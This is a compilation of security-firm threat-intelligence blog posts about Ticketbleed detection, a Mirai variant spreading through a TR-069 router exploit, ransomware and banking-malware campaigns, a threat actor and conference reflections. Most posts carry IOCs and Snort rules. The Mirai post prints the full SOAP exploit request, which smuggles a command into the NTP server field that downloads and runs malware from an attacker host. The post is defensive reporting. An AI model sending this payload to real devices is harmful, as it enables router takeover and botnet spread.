Detecting Ticketbleed (CVE-2016-9244)

Posted on by

On Thursday February 9th the vulnerability named ’Ticketbleed’ was made public. The name of this vulnerability does not just sound similar to Heartbleed, but also shares the same implication: remote reading of uninitialized memory. At the time we published Snort IDS detection rules for the Heartbleed vulnerability in OpenSSL, and have now decided to do the same for the F5 vulnerability: Ticketbleed.

About Ticketbleed:
The vulnerability that would later become known as Ticketbleed, was identified by Filippo Valsorda following a support ticket at Cloudflare. The symptoms were failing connections between applications using the TLS Library of the Go programming language and F5 BIG-IP appliances. Filippo identified that SSL resumption requests were failing due to an assumption of the Session Ticket ID length in F5’s TLS stack. This exposes up to 31 bytes of memory per session, a lot less than Hearbleed, which leaked 64k bytes at a time. For more technical details see Finding Ticketbleed post by Filippo.

Mitigation:
Those running vulnerable F5 Appliances have two options to mitigate this vulnerability. One option is to disable Session Tickets entirely on the F5, this should stop the leaking of memory immediately and at virtually no cost. The recommended fix is to upgrade to the latest firmware which plugs this specific problem entirely as described in the following KB article K05121675.

Detection:
At Fox-IT we frequently write IDS detection rules, especially for customers, APTs, hacking tools or new vulnerabilities like Ticketbleed. The Ticketbleed website bears the following warning for those writing IDS signatures to detect the vulnerability:

The issue can be identified by passive traffic monitoring, as the Session ID field is unencrypted.

However, I’d like to strongly discourage IDS vendors from making signatures that simply detect Session IDs shorter than 32 bytes. Any length between 1 and 32 bytes is legal according to the RFC specification.

The Go standard library legitimately uses 16 bytes Session IDs, and browsers considered using 1 byte Session IDs for this purpose. It’s important for security software not to needlessly constrain future decisions in that direction.

Taking this into account, we wrote two signatures for Snort IDS. The first rule searches for ‘Client Hello’ packets that have a session identifier that is shorter than 32 bytes. Using the ‘flowbits’ feature of Snort, the second signature looks for a ‘Server Hello’ packet that does contain a 32 byte session identifier. Writing rules to match binary protocols such as TLS can be challenging and has a higher chance of false positives. While this signature has not resulted in any False Positives on our side, we welcome any feedback as a result of these rules.

Rules:
The two rules can be found on our GitHub Gists:

https://gist.github.com/fox-srt/bc59eb69dc8f261f97f9623bde885f4b

When trying to verify hits in Wireshark we used the following expression filters:

Identify packets containing SSL session identifiers:

ssl.handshake.session_id_length

Search for session identifiers smaller than 32 bytes and equal to 32 bytes:

(ssl.handshake.session_id_length > 0 && ssl.handshake.session_id_length < 32) || ssl.handshake.session_id_length == 32

If the above filter returns two packets, you are likely dealing with a vulnerable F5 appliance. As can be seen in the following screenshot:

ticketbleed_wireshark

Wireshark filter matching Client en Server Hello with different ‘Session ID’ lengths.

Special thanks to Yun Zheng Hu for writing these rules!

Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot

Posted on by

Over the last two months a lot has been written about the DDoS malware called Mirai. The first known attack, that only later was attributed to Mirai, was against the Krebs On Security blog on September 20th. It is likely that this same botnet attacked Dyn a month later, causing a massive outage among popular websites world wide.

Previous attacks:

One of the attack types that appears to be new to the scene is the use of the Generic Router Encapsulation (GRE) protocol in order to flood victims with packets. This protocol was used against Krebs, but has also been mentioned before. More specifically in a piece by Arbor Networks about an IoT botnet, attacking the networks of the Olympics in Brazil. This could be Mirai, but the first known command and control (C2) server for Mirai was not registered until 2016-09-14. So either it was a different IoT botnet, such as Linux/Fgt (by Lizardsquad) or there was a previous Mirai botnet.

Shortly after the attack against Dyn, the main botnet, using C2 server santasbigcandycane.cx, went quiet and the source code of the Mirai botnet was released:

mirai-hfSource: https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

As a result of the source code becoming public, many new Mirai botnets started to appear. These botnets were a lot smaller than the original one. This is likely because the original botnet only spread by using default credentials of Telnet enabled devices and scanning the internet for them. So a limited amount of victims, most of which were likely already infected by the original botnet and because of that, blocking new infections.

Two researchers (@MalwareTechBlog & @2sec4u) created a public twitter feed tracking attacks launched by these Mirai botnets (@MiraiAttacks), so far they have identified at least 79 sub-botnets.

Recently there were claims of a bigger Mirai botnet, one that was bigger than all of the other ones combined. The operators of this botnet are selling access to this botnet and claim to have over 400.000 bots and using different spreading techniques than the original Mirai bot. The previously listed Mirai Tracker lists this botnet as ‘#14’.

Mirai botnet spreading using SOAP exploit:

A Mirai botnet using a different spreading approach than the original bot was observed by Fox-IT on Sunday. Just as the original botnet, the bots start attacking other devices on the internet in an attempt to infect them. Where the original bot uses Telnet and a set of default credentials, this version uses a recently documented SOAP exploit.

The bot is using the following POST request on TCP port 7547 to infect other devices:

----
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
<SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> 
<NewNTPServer1>
cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1
</NewNTPServer1> 
<NewNTPServer2></NewNTPServer2> 
<NewNTPServer3></NewNTPServer3> 
<NewNTPServer4></NewNTPServer4> 
<NewNTPServer5></NewNTPServer5> 
</u:SetNTPServers> 
</SOAP-ENV:Body></SOAP-ENV:Envelope>
----

A write-up on how this exploit works is provided by ‘Kenzo2017’ in his blogpost. The exploit is located in the implementation of a service that allows ISPs to configure and modify settings of specific modems using the TR-069 protocol. One of those settings allows, by mistake, the execution of Busybox commands such as wget to download malware. BusyBox is software that provides several stripped-down Unix tools in a single executable file.

In the exploit code you can see that the protocol allows for the ISP to set the NTP-servers which the modems should use, but rather than entering an IP or a hostname, a bash/busybox command is given:

`cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1`

We can break this command up in multiple parts:

– ‘wget’ is used to retrieve the malware from http://l.ocalhost[.]host.
– ‘chmod 777 1’ makes the file executable.
– ‘./1’ executes the malware on the system.

So could this be the Botnet #14, where the authors are boasting 400k infections?
This is possible, but for now difficult to verify. What we do know is that these management interfaces for modems are being exposed at various internet service providers around the world. In Germany this has lead to big problems for Deutsche Telecom, where an attacker disabled the internet for 900.000 modems, possibly using the same vulnerability. For now it is unclear if there was an attempt to load Mirai on these devices, or whether this is an unrelated attack.

This is likely not the last we will be seeing of Mirai and its successors. New spreading mechanisms and DDoS attack methods are being added in this gold rush for new victims, something we outlined more high level in a previous blog post.
Fox-IT is observing this botnet for future activity and possible victims of its DDoS attacks.

Mitigation:

  • ISPs should configure the modems to only allow connections to their management interfaces from the ISPs own management network, not the whole world.
  • Users could replace these modems if possible with their own, better secured devices.
  • Contact the ISP and vendor of the modems for patches that might resolve the vulnerability.

IOCs:

Hash: c723eebacfc8b845efbcc33c43dd3567dd026b1d (MIPS)
Hash: f37d2f6ff24429db2fc83434e663042c2667fa41 (ARM)

Hostname: l.ocalhost[.]host (download location)
Hostname: timeserver[.]host (c2 server)

New download location observed in Fox-IT honeypots:
Hostname: tr069[.]pw (download location)
Hostnane: p.ocalhost[.]host (download location)
IP: 5.8.65[.]5 (download location)

The following Snort IDS rule can be used to detect spreading attempts against your network:

alert tcp $EXTERNAL_NET any -> $HOME_NET 7547 (msg:”FOX-SRT – Exploit – TR-069 SOAP RCE NewNTPServer exploit incoming”; flow:established,to_server; content:”POST”; depth:4; content:”/UD/act?1″; content:”urn:dslforum-org:service:Time:1#SetNTPServers”; threshold: type limit, track by_dst, count 1, seconds 60; classtype:attempted-admin; reference:url,blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot; sid:1; rev:1;)

By changing the HOME_NET and EXTERNAL_NET in this rule, it can be used to detect clients within your network attacking hosts on the internet:

alert tcp $HOME_NET any -> $EXTERNAL_NET 7547 (msg:”FOX-SRT – Exploit – TR-069 SOAP RCE NewNTPServer exploit outgoing”; flow:established,to_server; content:”POST”; depth:4; content:”/UD/act?1″; content:”urn:dslforum-org:service:Time:1#SetNTPServers”; threshold: type limit, track by_src, count 1, seconds 60; classtype:attempted-admin; reference:url,blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot; sid:2; rev:1;)

These Snort rules can also be found on our Github.

Ziggo ransomware phishing campaign still increasing in size

Posted on by

Introduction

Fox-IT’s Security Operations Center (SOC) observed fake Ziggo invoice e-mails, since October 6th 2016, linking to a ransomware variant known as TorrentLocker.

The group behind TorrentLocker has previously been observed using fake Dutch postal service emails imitating PostNL, back in 2014.  This distribution method of abusing local postal service names was seen in a lot of countries where this threat was active. This was also documented in CERT PL’s report ‘Going Postal’ published last year. After continuous takedowns of the fake invoice domains with the help of Abuse.CH, the group seized their activities in the Netherlands, near the end of 2014, but continued in several other countries around the world.

The switch from using fake track and trace e-mail messages from postal services (from 2014 till 2016), to using fake invoices from a local Dutch ISP known as Ziggo, is an interesting switch in the modus operandi of the group behind TorrentLocker.

The reach of this e-mail campaign is rapidly increasing as a result of TorrentLocker stealing the address books from its victims to expand its list of new targets. Every successful infection increases the reach of the malicious e-mail campaign significantly. 

Current phishing e-mail

The e-mail below is an example of the phishing e-mail, which mimics the real Ziggo invoice e-mails:

Example of Ziggo phishing e-mail

The e-mail above contains a link to a fake Ziggo page that will force the user to download a ZIP file with the supposed invoice inside. The ZIP file contains a JavaScript file which will, when executed by the victim, download the TorrentLocker ransomware from a compromised WordPress website. When the victim’s data is encrypted, TorrentLocker shows the screen below, still using the name ‘Crypt0L0cker’, as seen 2 years ago:

TorrentLocker lock screen

Indicators of compromise

Currently (October 6th 2016) active campaign distribution domain:

  • ziggo-online23.org / 212.92.97.28

Other Ziggo domains used in previous e-mail campaigns:

  • ziggo-online23.org
  • ziggo-online12.com
  • ziggo-online247.net
  • ziggo-online24.net
  • ziggo-online24.org
  • ziggo-factuur84.org
  • ziggo-factuur23.org

All domains registered by the group behind TorrentLocker are registered at REG.RU. With the continued effort of AbuseCH we have been taking down these domains as soon as they appear.

TorrentLocker initially communicates via SSL to several IPs to reach its command and control server. The current IP being used for this communication is:

  • 185.40.152.22

The certificate used for this SSL connection typically contains the following static information (more sample and information for these SSL certificates can be found on AbuseCH’s SSL Blacklist):

  • C=US, ST=Denial, L=Springfield, O=Dis

After the initial SSL connection, all other network communication is ran through Tor. Files encrypted by TorrentLocker will be appended by the ‘.enc’ extension. More details on the prevention of ransomware can be found in our earlier TorrentLocker blog: New Torrentlocker variant active in the Netherlands.

Mofang: A politically motivated information stealing adversary

Posted on by

mofang_cover_imageMofang (模仿, Mófa ̌ng, to imitate) is a threat actor that almost certainly operates out of China and is probably government-affiliated. It is highly likely that Mofang’s targets are selected based on involvement with investments, or technological advances that could be perceived as a threat to the Chinese sphere of influence. This is most clearly the case in a campaign focusing on government and critical infrastructure of Myanmar that is described in this report. Chances are about even, though, that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved. In addition to the campaign in Myanmar, Mofang has been observed to attack targets across multiple sectors (government, military, critical infrastructure and the automotive and weapon industries) in multiple countries.

The following countries have, in the above named sectors, been affected, although Fox-IT suspects there to be more: India, Germany, United States, Canada, Singapore, South Korea.

mofang_targetedcountries_image

Despite its diverse set of targets Mofang is probably one group. This is based on the fact that its tools (ShimRat and ShimRatReporter) are not widely used, and that campaigns are not usually observed in parallel. Technically, the group uses distinct tools that date back to at least February 2012: ShimRat and ShimRatReporter. The mofang group does not use exploits to infect targets, they rely on social engineering and their attacks are carried out in three stages:

  1. Compromise for reconnaissance, aiming to extract key information about the target infrastructure.
  2. Faux infrastructure setup, designed to avoid attracting attention.
  3. The main compromise, to carry out actions on the objective.

The name ShimRat is based on how its persistence is build up. It uses the so-called shims in Windows to become persistent. Shims are simply hot patching processes on the fly, to ensure backward compatibility of software on the Microsoft Windows platform.

As far as known, the only exploits the Mofang group uses are privilege elevation exploits built into their own malware. The vulnerabilities that were being exploited were already known about at the time of use. The full report contains contextual as well as technical information about the group and its activities. These can be used, for example, for threat assessments, compromise assessments, incident response and forensics activities.

Download ‘Mofang – a politically motivated information stealing adversary’

LinkedIn information used to spread banking malware in the Netherlands

Posted on by

Since early this morning (7th of June 2016, around 08:30 AM) the Fox-IT Security Operations Center started detecting a large amount of phishing e-mails containing a malicious Word document. This e-mail campaign appears to be targeting the Netherlands, using Dutch text in both the e-mail and Word document. The content of the e-mail:

Geachte Firstname Lastname,
RoleCompany

Wij schrijven u in verband met de factuur met nummer 014321463.
De nota staat open sinds 9-jun-16. Het openstaande bedrag is 2,487.50 Euro. 
Vriendelijk verzoeken wij u het openstaande bedrag te betalen.

Betaling graag zo spoedig mogelijk.

Met vriendelijke groet,

A.E. De Kuiper,
BEEREJAN HOLDING BV.
Faisantenstraat 53 Hilversum 1211 PT
Tel. +31180647000
Fax. +31294484970

The first name, last name, role and company name are all values that are taken from the LinkedIn page of the receiver of the phishing mail, giving the e-mail a very personalized look.

The subject of the e-mail contain the company name, with a semi-random invoice related subject. Some examples:

  • Company : De nota is nog niet betaald
  • Company – De nota is onbetaald gebleven
  • Company – Uw laatste factuur wacht op betaling

At this point Fox-IT cannot directly link this phishing campaign to the recent LinkedIn database leak.

The e-mail contains a Word document with a Macro.
The name of the document is also based on personal information of the receiver:

  • Company-Firstname-Lastname.doc

Screenshot phishing campagin

The content of the Word document appears to be scrambled, this is an attempt to trick the user into running the embedded Macro, in order to view the document.

The Macro retrieves a binary from the following (likely compromised) website:

  • ledpronto.com/app/office.bin (sha256: c1e21a06a1fa1de2998392668b6910ca2be0d5d9ecc39bd3e3a2a3ae7623400d)

The Fox-IT InTELL team has identified the retrieved malware as the Zeus Panda banking malware. Zeus Panda, in this case, always connects to the following domain & IP using SSL:

  • skorianial.com / 107.171.187.182

Zeus Panda is a type of banking malware based on Zeus source code, more information can be found here: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market

The following SSL certificate is used by the Panda Zeus Command and Control server:

If you’ve opened the Word attachment and enabled the Macro, consider scanning your system with various anti-virus solutions.

Ransomware deployments after brute force RDP attack

Posted on by

Fox-IT has encountered various ways in which ransomware is being spread and activated. Many infections happen by sending spam e-mails and luring the receiver in opening the infected attachment. Another method is impersonating a well-known company in a spam e-mail stating an invoice or track&trace information is ready for download. By following the link provided in the e-mail, the receiver can download the file which contains the malware from a convincing looking website. Distributing ransomware through malvertising, an exploit kit being served on an advertisement network, is also a common way for criminals to infect systems.

In the past few months, Fox-IT’s incident response team, FoxCERT, was involved in several investigations where a different technique surfaced: activating ransomware from a compromised remote desktop server.

Getting access

Before we get to why this might be lucrative for the criminals, how do they get access in the first place? RDP, or Remote Desktop Protocol, is a propriety protocol developed by Microsoft to provide remote access to a system over the network. This can be the local network, but also the Internet. When a user successfully connects to a system running remote desktop services (formerly known as terminal services) over RDP, the user is presented with a graphical interface similar to that when working on the system itself. This is widely used by system administrators for managing various systems in the organization, by users working with thin clients, or for working remotely. Attackers mostly tend to abuse remote desktop services for lateral movement after getting foothold in the network. In this case however, RDP is their point of entry into the network.

Entries in the log files show the attackers got access to the servers by brute forcing usernames and passwords on remote desktop servers that are accessible from the internet. Day in, day out, failed login attempts are recorded coming from hundreds of unique IP-addresses trying hundreds of unique usernames. Connecting remote desktop servers directly to the internet is not recommended and brute forcing remote desktop services is nothing new. But without the proper controls in place to prevent or at least detect and respond to successful compromises, brute force RDP attacks are still relevant. And now with a ransomware twist as well.

visio_blog
Image 1: Example network with compromised RDP server and attacker deploying ransomware.

The impact

After brute forcing credentials to gain access to a remote desktop server, the attackers can do whatever the user account has permissions to on the server and network. So how could an attacker capitalize on this? Underground markets exist where RDP credentials can be sold for an easy cash-out for the attacker. A more creative attacker could attempt all kinds of privileged escalation techniques to ultimately become domain administrator (if not already), but most of the times this is not even necessary as the compromised user account might have access to all kinds of network shares with sensitive data. For example Personally identifiable information (PII) or Intellectual property (IP) which in its turn can be exfiltrated and sold on underground markets. The compromised user account and system could be added to a botnet, used as proxy server, or used for sending out spam e-mail messages. Plenty of possibilities, including taking the company data hostage by executing ransomware.

Depending on the segmentation and segregation of the network, the impact of ransomware being executed from a workstation in a client LAN might be limited to the network segments and file shares the workstation and affected user account can reach. From a server though, an attacker might be able to find and reach other servers and encrypt more critical company data to increase the impact.

The power lies in the amount of time the attackers can spend on reconnaissance if no proper detection controls are in place. For example, the attackers have time to analyze how and when back-ups are created of critical company data before executing the ransomware. This helps to make sure the back-ups are useless in restoring the encrypted data which in its turn increases the chances of a company actually paying the ransom. In the cases Fox-IT was involved in investigating the breaches, the attackers spend weeks actively exploring the network by scanning and lateral movement. As soon as the ransomware was activated, no fixed ransom was demanded but negotiation by e-mail was required. As the attackers have a lot of knowledge of the compromised network and company, their position in the negotiation is stronger than when infection took place through a drive-by download or infected e-mail attachment. The demanded ransom reflects this and could be significantly higher.

indialocker
Image 2: Example ransomware wallpaper.

Prevention, detection, response

Connecting Remote Desktop Services to the Internet is a risk. Services like that, which are not essential, should be disabled. If remote access is necessary, user accounts with remote access should have hard to guess passwords and preferably a second factor for authentication (2FA) or second step in verification (2SV). To prevent eaves dropping on the remote connection, a strong encryption channel is recommended. Brute force attacks on remote desktop servers and ransomware infections can be prevented. Fox-IT can help to improve your company’s security posture and prevent attacks, for example by an architecture review, security audit or training.

If prevention fails, swift detection will reduce the impact. With verbose logging securely stored and analyzed, accompanied by 24/7 network and end point monitoring an ongoing breach or malware infection will be detected and remediated. The Cyber Threat Management platform can assist in detecting and preventing attacks. And if business continuity and reputation are at stake, our emergency response team is available 24/7.

Wouter Jansen, Senior Forensic IT Expert at Fox-IT

 

 

 

 

Large malvertising campaign hits popular Dutch websites

Posted on by

On Sunday April 10th the Fox-IT Security Operations Center (SOC) started to see an increase of exploit kit related incidents. The incidents originated from a large malvertising campaign hitting the Netherlands. The list of affected websites spreads across most of the popular Dutch websites. In total we’ve now seen at least 288 websites being affected. To give an impression of the impact, the list of affected websites includes:

  • nu.nl
  • marktplaats.nl
  • sbs6.nl
  • rtlnieuws.nl
  • rtlz.nl
  • startpagina.nl
  • buienradar.nl
  • kieskeurig.nl
  • veronicamagazine.nl
  • iculture.nl
  • panorama.nl

Note: Malvertising is caused by malicious content providers in the advertisement ecosystem, and not caused by the affected websites themselves (f.e those listed above).

We’ve been in contact with the affected advertisement provider who responded quickly to the incident and has filtered the listed IOCs in their advertisement platform. They will be tracking down the affected content provider as this issue has not been fully resolved, it has simply been filtered for now. More information on malvertising can be found here: [ Malvertising: Not all Java from java.com is legitimate ].

Details of the exploit kit redirect

The malvertising is occurring through an advertisement platform which is actively used on the above mentioned websites. From the websites, external scripts are loaded which in turn redirect further towards the exploit kit. We’ve observed the Angler Exploit Kit being active on these redirects during this campaign. We have not seen any successful infections at our customer yet.

One of the redirects towards the Angler exploit kit as observed by our monitoring platform:

protact-fox-it-com-angler-malvertising

Indicators of Compromise (IOCs)

The following two domains have been observed to redirect the users from the affected websites towards the exploit kits. Blocking these two domains will aid in stopping the redirects for now:

  • traffic-systems.biz (188.138.69.136)
  • medtronic.pw (188.138.68.191)

Website of security certification provider spreading ransomware

Posted on by

Since Monday the 21st of March the Fox-IT Security Operations Center (SOC) has been observing malicious redirects towards the Angler exploit kit coming from the security certification provider known as the EC-COUNCIL. As of writing this blog article on the Thursday the 24th of March the redirect is still present on the EC-COUNCIL iClass website for CEH certification located at iclass[dot]eccouncil[dot]org. We have reached out and notified the EC-COUNCIL but no corrective action has been taken yet.

Update 25-4-2016: EC-COUNCIL put out a publication regarding the malicious redirect. They’ve cleaned up and removed the malicious redirect, the publication was made on their Facebook page and linked to on their Twitter account.

Exploit kit details: Angler exploit kit

We first observed the redirect on Monday around 3pm GMT but we suspect it might have been there for a longer period of time. The redirect occurs only when specific conditions are met, these conditions are:

  • The visitor has to have Microsoft Internet Explorer as a browser (or at least the user-agent has to represent Internet Explorer)
  • The visitor comes from a search engine like Google or Bing
  • The visitor’s IP address is not blacklisted or belonging to a blocked geolocation. The inject avoids certain countries (possibly tied to a bad ‘ROI’ for the criminals running the ransomware that is being dropped)

Once a visitor meets all these requirements a redirect is embedded at the bottom of the page as seen in this screenshot:
EC-COUNCIL iClass Angler exploit kit injected script

Through this embedding the client is redirected a couple of times to avoid/frustrate/stop manual analysis and some automated systems. Once the user has jumped through all the redirects he/she ends up on the Angler exploit kit landing page from which the browser, flashplayer plugin or silverlight plugin will be exploited. The Angler exploit kit first starts the ‘Bedep’ loader on an exploited victim machine which will download the final payload.

The way the redirect occurs on the EC-COUNCIL website is through PHP code on the webserver which is injecting the redirect into the webpage. A vulnerability in the EC-COUNCIL website is most likely exploited as it runs the very popular WordPress CMS which has been a target through vulnerable plug-ins for years.

Payload details: TeslaCrypt

This specific campaign instance of the Angler exploit kit drops ‘TeslaCrypt’ on the exploited victim’s machine. TeslaCrypt is a piece of ransomware which takes a victim’s files hostage with the use of encryption. Once the victim’s files have been successfully encrypted a ransom note is presented to instruct the victim on ways to recover files:

TeslaCrypt 4.0 ransom notes

TeslaCrypt requires the victim to pay around 1.5 BTC to get their files back; this equals to approximately 622$ at the current conversion rate.

Indicators of Compromise (IOCs)

Bedep C&C servers:

  • 89.163.240.118 / kjnoa9sdi3mrlsdnfi[.]com
  • 85.25.41.95 / moregoodstafsforus[.]com
  • 89.163.241.90 / jimmymorisonguitars[.]com
  • 162.244.32.121 / bookersmartest[.]xyz

TeslaCrypt C&C servers:

  • 50.87.127.96 / mkis[.]org
  • 213.186.33.104 / tradinbow[.]com

Financial Crisis Exercise at RSA 2016

Posted on by

This year, at the RSA Conference, held in San Francisco from February 29 – March 4, Fox-IT was asked to host a financial cyber crisis table top exercise for the Learning Labs portion of the conference.

This was a great opportunity for us to showcase some of what Fox-IT does for companies:  training and aiding companies in incident response. Our exercise provided an opportunity to address a cyber threat scenario in an interactive and collaborative tabletop exercise.

Goliath National Bank

RSA_2The exercise took two hours to complete, tracking down discrepancies in the balance sheets of one Goliath National Bank (GNB), a prominent (fictitious) retail bank in the (fictitious) European country of Ramul. The exercise was designed to:

  • elicit constructive discussion as participants examine and resolve problems
  • identify where existing approaches need to be refined
  • establish relationships and share information with other organizations & partners
  • raise the awareness of the security community about challenges when dealing with a cyber crisis

The exercise was designed as a paper-based exercise with a facilitated discussion of a scripted scenario, where planners and players sit together in one room for the exercise execution.

Overall the session was very popular. There were a lot more people queuing up for the session than there was place for during the session. The attendees that did make it in, were very engaged.

Real life role playing

Each team distributed roles such as CIO, CISO, HR Director, PR Director, General Counsel or IT director. Reflecting the wide variety of attendees at RSA, we were delighted to discover that many of the roles were represented by players who had these roles in real life.

RSA_3Teams played in rounds where new information about an incident was revealed in every turn. The attendees had to pick their next steps and the closer they were with the ideal scenario, the more points they scored.

As crisis teams work through serious events, there is often partial information and there are unclear causes of events and unclear future effects. Therefore, war gaming and cyber crisis table top sessions are required on a regular basis for the crisis management team to gain experience in this field of expertise.

Restoring operations

The most difficult phase of the Learning Lab (as well as in a real life incidents) is the moment a crisis team receives the details about how the incident took place. From that moment in time the team has to switch from focusing on ‘identifying the root cause’ to ‘restoring operations’. They must find a healthy balance wherein the investigation continues, but the ‘restore operations’ priority becomes the most important. We can call this moment between investigation and mitigation an ‘impasse moment’. In order to make the right call, the crisis management team should be able to look at the incident from a helicopter view and come to a clear decision with regards to the next steps, by taking into account the investigation findings, business interests and potential future consequences related to the incident.

Fox-IT’s cyber crises exercises

Fox-IT regularly hosts cyber crisis exercises. Ranging from high-level tabletop sessions where an organizations’ crisis team is involved down to detailed, multi-day, technical challenges for computer emergency response teams and other IT personnel that is involved in a crisis. Whether you want a first introduction into crisis management, or want to train your crisis team periodically, our seasoned experts are able to help.

Would you like to know how we can help you to improve your organization’s resiliency? Please contact Rombert Anjema from FoxAcademy, tel. +31 (0)15 284 79 99, e-mail fox@fox-it.com

Kevin Jonkers, Manager Forensics & Incident Response at Fox-IT, Sarah Brown, Principal Cyber Security Expert at Fox-IT and Krijn de Mik, Principal Cyber Security Expert at Fox-IT

RSA 2016: A Long Road Ahead for Security

Posted on by

We recently attended the RSA Conference, held in San Francisco from February 29 – March 4, to speak with our European clients. Does that surprise you? Far more Europeans visit this conference than you might think. The RSA Conference is the largest trade show for security in the world, yet its main attraction lies not so much in what can be seen on the main floor. Of even more interest are the meetings with security officers from a wide array of organizations that coincide with the trade show. This is where the real action takes place.

Importance of Integrating Solutions

Every year, I’m struck by the enormous gap that exists between the claims made out on the trade show floor and what is found to work in the field. Conversations at the trade show are the only way to find out whether the claims are true, and whether there is even a need for them in practice. As you navigate the trade stands, you encounter a myriad of solutions that are perfectly capable of fending off a specific type of attack — or at least claim to do so. Given that there are all manner of attacks, one should therefore deploy multiple solutions for effective, high-level security. Well, naturally CISOs are not going to go for that. Rather, for them, the challenge lies in integration: using the security solutions you already have in place and processing their results in such a way that you enable your team to efficiently and effectively counter a broad spectrum of attacks.

Costs Rising for Hackers

This focus on integration is evident in, for example, the growing attention paid to the economics of hacking. There are even CISOs who are held accountable for how successful they are at raising the costs for a hacker to mount an attack, and who therefore go so far as set a specified amount as a personal target. This means that CISOs need resources that allow them to block the paths that are the simplest — and therefore the cheapest — for hackers.

Intelligence Hype

The concept of threat intelligence has been on the rise for a long time. If you know who is targeting you and how they operate, you can find them more readily in your network or systems. Meanwhile, the number of suppliers that furnish intel feeds, often consisting of no more than lists of ‘bad’ IP addresses or file hashes, has proliferated. This all leads to market hype. CISOs are drowning in information; one feed after another issues a torrent of information that is too cumbersome for them to work with. What I’m hearing from CISOs is that they would prefer to receive far less technical information, and would instead like more context: Who are the attackers? What are their motives? What are they targeting?

First Aid for Panic

Another increasingly common need is to receive help once a data breach has been discovered. Panic usually breaks out first, especially in the Netherlands now that Meldplicht datalekken, a Dutch law concerning the mandatory notification of data breaches, is in force. To fulfil this notification obligation, everything has to be set in motion immediately: Involved parties (such as users and patients) must be informed, the Dutch Data Protection Authority must receive the necessary information, and numerous technical measures must be taken. Owing to the panic and time pressures, there is a pressing need for expertise and tools that can support an organization. Examples include ensuring that the breached company can demonstrate its conduction of a thorough investigation of the incident and helping it to supply the required information on time. This overarching need is consistent with the idea that it is not possible to set up 100% foolproof security. Even when things go wrong, organizations need to be able to mount a swift and adequate response.

Major Cloud Providers Serious About Data Storage Location

Rules and regulations are also an issue in other areas. Following the issue around Safe Harbor, several major cloud providers now take seriously the fact that Europe has a different stance on privacy than the United States. These cloud providers realize that they need to be able to deliver hard guarantees about where data is stored. This clearly goes against the ‘cloud mindset’ that data location no longer matters. But the awareness is slowly sinking in that there is no way to avoid European regulations.

No Silver Bullet

The RSA trade show floor teems with promises of, if you will, security ‘silver bullets’, whether these involve machine learning, threat intelligence, APT defense, or some other term that’s trendy at the moment. Despite this, I have yet to find at RSA the panacea that would give security professionals a distinct advantage over their attackers. This is perhaps unsurprising, given that RSA is ultimately a marketing extravaganza. It’s an excellent place to get a feel for what’s ‘hot’, but it’s not likely to provide the most reliable information for your next security purchase. Fortunately, the security community surrounding the trade fair appears to understand this. No one doubts the importance of technology, but it is only useful insofar as it supports your security operations team and the professional management of your security.

Jeremy_ButcherJeremy Butcher, Fox-IT Director of Operations